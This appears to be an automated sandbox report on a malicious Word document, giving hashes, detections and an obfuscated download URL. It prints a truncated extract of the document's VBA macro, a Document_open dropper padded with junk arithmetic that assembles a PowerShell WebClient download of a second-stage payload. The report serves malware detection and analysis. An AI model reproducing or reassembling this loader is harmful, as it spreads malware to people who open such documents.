Office (OLE) malware analysis — malicious · 7b47726569e22a0f

MALICIOUS

Office (OLE)

145.0 KB Created: 2018-04-25 12:31:00 Authoring application: Microsoft Office Word First seen: 2018-06-14

MD5: 9af71076c6365b6d59534d5d1ef0a6c1 SHA-1: 23483cb8c661ab4617720dc5e6d290aa4f416a27 SHA-256: 7b47726569e22a0f8d69d2df9cd79a73c3b26a069984d089360b91f56ffc4e06

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The 'Document_Open' macro is present and triggers a 'Shell()' call, indicating an attempt to execute external code. This macro likely downloads and executes a second-stage payload from the embedded URL: http://triGC9+GC9nityprGC9+GC9oGC9+GC9sound.com/1jeI1/KAyGC9+GC9.SpliGC9+GC9YBu1. The ClamAV detection 'Doc.Dropper.Agent-6517621-0' further confirms its dropper functionality.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6517621-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6517621-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://triGC9+GC9nityprGC9+GC9oGC9+GC9sound.com/1jeI1/KAyGC9+GC9.SpliGC9+GC9YBu1 In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 38164 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	38164 bytes
SHA-256: `32ea05e5853c634fa09024fb753381d3988e2d0a3f39686301d77d3b46ba4d52`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "TLhmRtLsZKTd" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub uBWMcM(jIWXci) YaFHc = 6527 * zrtns + 34257 * ChrB(24279 * Rnd(89155) - 80060 + ENmzJ) - 41860 - Rnd(iGzzT) + 90520 - WLHzO * 48687 * Chr(BVOwK) End Sub Sub YkuTpS(SOsKO) rYVFR = 56925 * qRjKNj + 31380 * ChrB(95276 * Rnd(5282) - 83840 + Czsoz) - 22094 - Rnd(KBZkHT) + 93640 - JhifPw * 37268 * Chr(mHEkG) CXQXT = 17058 * MDaKb + 13566 * ChrB(54909 * Rnd(43174) - 10494 + MNcWi) - 36144 - Rnd(bbilF) + 64258 - aYAwBU * 69675 * Chr(nWziD) opqrh = 94940 * XdmTFt + 91648 * ChrB(84226 * Rnd(50253) - 56347 + VhjCG) - 56982 - Rnd(kZLZF) + 49642 - PBmlr * 87673 * Chr(kBDuO) End Sub Sub wboINt(IWmljN) wXjzY = 24393 * qsIFi + 68674 * ChrB(66082 * Rnd(72648) - 61676 + IswXJl) - 5962 - Rnd(MjwsO) + 2180 - iWbMU * 10801 * Chr(BQGjf) fJIWq = 12106 * rPznmd + 72707 * ChrB(22392 * Rnd(56429) - 35691 + dHDDNG) - 49069 - Rnd(amqhR) + 50856 - AjDbZ * 4675 * Chr(XKPXo) End Sub Private Sub Document_open() On Error Resume Next rTKYw = 18119 * YzbwB + 94496 * ChrB(59774 * Rnd(61232) - 83676 + iiMhc) - 10313 - Rnd(CtuUj) + 85765 - qSATGb * 35004 * Chr(HUjBEG) HvWQKEKuKTwpCN (cXcjJ + TSNldAaI + obrOOC) FOkoG = 76899 * jzLZQ + 67008 * ChrB(98815 * Rnd(51140) - 84337 + bABcQ) - 45316 - Rnd(DiGBqI) + 9932 - Zwdtks * 89509 * Chr(AqfLD) End Sub Sub biOkq(NAtoqs) XhEsoG = 63453 * mVhHIh + 69993 * ChrB(1508 * Rnd(72010) - 72014 + onHYn) - 11902 - Rnd(SiYCo) + 4232 - HWjwzq * 10946 * Chr(ZoMjc) FdzIDf = 6554 * QIRmXn + 4541 * ChrB(34889 * Rnd(70402) - 63747 + QBKBEn) - 90614 - Rnd(SOTMG) + 57549 - NBZtlW * 77437 * Chr(GaiLS) UGDiB = 23278 * ubvUIZ + 70926 * ChrB(64973 * Rnd(93652) - 93026 + IoaAt) - 82514 - Rnd(IbqEba) + 54245 - owIPhE * 34277 * Chr(SZiYd) End Sub Sub DdJdSC(rTNMjt) qqAUsf = 71884 * ZjOGqm + 15952 * ChrB(52444 * Rnd(28782) - 34942 + KYMuz) - 14248 - Rnd(wwfuD) + 96442 - hLbYJ * 61509 * Chr(MQDcPL) End Sub Sub sirwu(iLdwD) ThoHf = 57256 * vJbjC + 10914 * ChrB(73433 * Rnd(38391) - 97644 + JRivN) - 11314 - Rnd(nvIjd) + 42139 - fVvMQX * 18892 * Chr(zwQCR) ptIzj = 8002 * iVRFb + 51750 * ChrB(38017 * Rnd(69560) - 40846 + SntBhJ) - 48697 - Rnd(bzlSj) + 60053 - oLzCA * 67418 * Chr(RMAAiH) End Sub Attribute VB_Name = "wqndOzOXBIjjt" Sub GiMlm(nPViVA) VjAjf = 33868 * iHzoV + 64314 * ChrB(93445 * Rnd(33498) - 19098 + SRplLi) - 76990 - Rnd(rOBjU) + 10983 - NYtqA * 53053 * Chr(Ridwk) End Sub Function TSNldAaI() On Error Resume Next kdwZHV = 12728 * vCaOi + 89019 * ChrB(79414 * Rnd(6287) - 72377 + YCczB) - 61568 - Rnd(MdPJA) + 32016 - RZjZdk * 87067 * Chr(CYsrHp) wIzFCtL = iItQud("%8XUmfGC9+GC9d.nexGC9+GC9t(GC9+GC91000GC9+GC90,'+' GC9+GC9282133GC9+GC9);GC9+GC9bGC9+GC97dADCGC9+GC9XG0Pz", ziwqb - ziwqb + 7 + ziwqb - ziwqb, ziwqb - ziwqb + 96 + ziwqb - ziwqb) jbsPO = 74063 * IlbSU + 91566 * ChrB(84237 * Rnd(83500) - 83944 + mpwINP) - 49705 - Rnd(OiADH) + 19101 - PuznR * 70650 * Chr(wsRvw) wkiAlz = 46810 * UjPYj + 58047 * ChrB(64540 * Rnd(36873) - 58610 + urULjf) - 95736 - Rnd(iifsf) + 59239 - ndEnzJ * 12072 * Chr(NLDRu) zbwKtOpzi = iItQud("jIFdW+[ChaR]82+[ChaR]76),[sTriNG][ChaR]36).REPlAce(([ChaR]71+[ChaR]67+[ChaR]57),i,", QzCLh - QzCLh + 6 + QzCLh - QzCLh, QzCLh - QzCLh + 75 + QzCLh - QzCLh) JAzkvj = 95834 * mBzCS + 36996 * ChrB(89094 * Rnd(78957) - 52495 + lcwAc) - 61065 - Rnd(XokGAf) + 25891 - qVdiI * 70374 * Chr(wZqDow) hrFGq = 78663 * RMdQAs + 75608 * ChrB(92338 * Rnd(2043) - 28903 + riWPz) - 87038 - Rnd(pzhzDk) + 55727 - hMzDrH * 71260 * Chr(ZdKIUA) fkYARL = iItQud("ELY0Z2GC9+GC'+'9bjGC9+GC9ecGC9+GC9tKAy)GC9+GC9 System.NeGC9+GC9t.GC9+GC9WebClieGC9+GC9nt;b7dNSBGC9+GC9 = b7GC9+GC9dnsGC9+GC9adaGC9+GC9s4UW", nLYjCj - nLYjCj + 7 + nLYjCj - nLYjCj, nLYjCj - nLYjCj + 129 + nLYjCj - nLYjCj) SQWDz = 74379 * StLXBr + 5976 * ChrB(38188 * Rnd(17717) - 86036 + AKbwzX) - 99365 - Rnd(rzlnk) + 27582 - jOjhhf * 25339 * Chr(tDrUG) Uwprzd = 2 ... (truncated)

SHA-256: 32ea05e5853c634fa09024fb753381d3988e2d0a3f39686301d77d3b46ba4d52

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "TLhmRtLsZKTd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub uBWMcM(jIWXci)
YaFHc = 6527 * zrtns + 34257 * ChrB(24279 * Rnd(89155) - 80060 + ENmzJ) - 41860 - Rnd(iGzzT) + 90520 - WLHzO * 48687 * Chr(BVOwK)
End Sub
Sub YkuTpS(SOsKO)
rYVFR = 56925 * qRjKNj + 31380 * ChrB(95276 * Rnd(5282) - 83840 + Czsoz) - 22094 - Rnd(KBZkHT) + 93640 - JhifPw * 37268 * Chr(mHEkG)
CXQXT = 17058 * MDaKb + 13566 * ChrB(54909 * Rnd(43174) - 10494 + MNcWi) - 36144 - Rnd(bbilF) + 64258 - aYAwBU * 69675 * Chr(nWziD)
opqrh = 94940 * XdmTFt + 91648 * ChrB(84226 * Rnd(50253) - 56347 + VhjCG) - 56982 - Rnd(kZLZF) + 49642 - PBmlr * 87673 * Chr(kBDuO)
End Sub
Sub wboINt(IWmljN)
wXjzY = 24393 * qsIFi + 68674 * ChrB(66082 * Rnd(72648) - 61676 + IswXJl) - 5962 - Rnd(MjwsO) + 2180 - iWbMU * 10801 * Chr(BQGjf)
fJIWq = 12106 * rPznmd + 72707 * ChrB(22392 * Rnd(56429) - 35691 + dHDDNG) - 49069 - Rnd(amqhR) + 50856 - AjDbZ * 4675 * Chr(XKPXo)
End Sub
Private Sub Document_open()
On Error Resume Next
rTKYw = 18119 * YzbwB + 94496 * ChrB(59774 * Rnd(61232) - 83676 + iiMhc) - 10313 - Rnd(CtuUj) + 85765 - qSATGb * 35004 * Chr(HUjBEG)
HvWQKEKuKTwpCN (cXcjJ + TSNldAaI + obrOOC)
FOkoG = 76899 * jzLZQ + 67008 * ChrB(98815 * Rnd(51140) - 84337 + bABcQ) - 45316 - Rnd(DiGBqI) + 9932 - Zwdtks * 89509 * Chr(AqfLD)
End Sub
Sub biOkq(NAtoqs)
XhEsoG = 63453 * mVhHIh + 69993 * ChrB(1508 * Rnd(72010) - 72014 + onHYn) - 11902 - Rnd(SiYCo) + 4232 - HWjwzq * 10946 * Chr(ZoMjc)
FdzIDf = 6554 * QIRmXn + 4541 * ChrB(34889 * Rnd(70402) - 63747 + QBKBEn) - 90614 - Rnd(SOTMG) + 57549 - NBZtlW * 77437 * Chr(GaiLS)
UGDiB = 23278 * ubvUIZ + 70926 * ChrB(64973 * Rnd(93652) - 93026 + IoaAt) - 82514 - Rnd(IbqEba) + 54245 - owIPhE * 34277 * Chr(SZiYd)
End Sub
Sub DdJdSC(rTNMjt)
qqAUsf = 71884 * ZjOGqm + 15952 * ChrB(52444 * Rnd(28782) - 34942 + KYMuz) - 14248 - Rnd(wwfuD) + 96442 - hLbYJ * 61509 * Chr(MQDcPL)
End Sub
Sub sirwu(iLdwD)
ThoHf = 57256 * vJbjC + 10914 * ChrB(73433 * Rnd(38391) - 97644 + JRivN) - 11314 - Rnd(nvIjd) + 42139 - fVvMQX * 18892 * Chr(zwQCR)
ptIzj = 8002 * iVRFb + 51750 * ChrB(38017 * Rnd(69560) - 40846 + SntBhJ) - 48697 - Rnd(bzlSj) + 60053 - oLzCA * 67418 * Chr(RMAAiH)
End Sub

Attribute VB_Name = "wqndOzOXBIjjt"
Sub GiMlm(nPViVA)
VjAjf = 33868 * iHzoV + 64314 * ChrB(93445 * Rnd(33498) - 19098 + SRplLi) - 76990 - Rnd(rOBjU) + 10983 - NYtqA * 53053 * Chr(Ridwk)
End Sub
Function TSNldAaI()
On Error Resume Next
kdwZHV = 12728 * vCaOi + 89019 * ChrB(79414 * Rnd(6287) - 72377 + YCczB) - 61568 - Rnd(MdPJA) + 32016 - RZjZdk * 87067 * Chr(CYsrHp)
wIzFCtL = iItQud("%8XUmfGC9+GC9d.nexGC9+GC9t(GC9+GC91000GC9+GC90,'+' GC9+GC9282133GC9+GC9);GC9+GC9bGC9+GC97dADCGC9+GC9XG0Pz", ziwqb - ziwqb + 7 + ziwqb - ziwqb, ziwqb - ziwqb + 96 + ziwqb - ziwqb)
jbsPO = 74063 * IlbSU + 91566 * ChrB(84237 * Rnd(83500) - 83944 + mpwINP) - 49705 - Rnd(OiADH) + 19101 - PuznR * 70650 * Chr(wsRvw)
wkiAlz = 46810 * UjPYj + 58047 * ChrB(64540 * Rnd(36873) - 58610 + urULjf) - 95736 - Rnd(iifsf) + 59239 - ndEnzJ * 12072 * Chr(NLDRu)
zbwKtOpzi = iItQud("jIFdW+[ChaR]82+[ChaR]76),[sTriNG][ChaR]36).REPlAce(([ChaR]71+[ChaR]67+[ChaR]57),i,", QzCLh - QzCLh + 6 + QzCLh - QzCLh, QzCLh - QzCLh + 75 + QzCLh - QzCLh)
JAzkvj = 95834 * mBzCS + 36996 * ChrB(89094 * Rnd(78957) - 52495 + lcwAc) - 61065 - Rnd(XokGAf) + 25891 - qVdiI * 70374 * Chr(wZqDow)
hrFGq = 78663 * RMdQAs + 75608 * ChrB(92338 * Rnd(2043) - 28903 + riWPz) - 87038 - Rnd(pzhzDk) + 55727 - hMzDrH * 71260 * Chr(ZdKIUA)
fkYARL = iItQud("ELY0Z2GC9+GC'+'9bjGC9+GC9ecGC9+GC9tKAy)GC9+GC9 System.NeGC9+GC9t.GC9+GC9WebClieGC9+GC9nt;b7dNSBGC9+GC9 = b7GC9+GC9dnsGC9+GC9adaGC9+GC9s4UW", nLYjCj - nLYjCj + 7 + nLYjCj - nLYjCj, nLYjCj - nLYjCj + 129 + nLYjCj - nLYjCj)
SQWDz = 74379 * StLXBr + 5976 * ChrB(38188 * Rnd(17717) - 86036 + AKbwzX) - 99365 - Rnd(rzlnk) + 27582 - jOjhhf * 25339 * Chr(tDrUG)
Uwprzd = 2
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.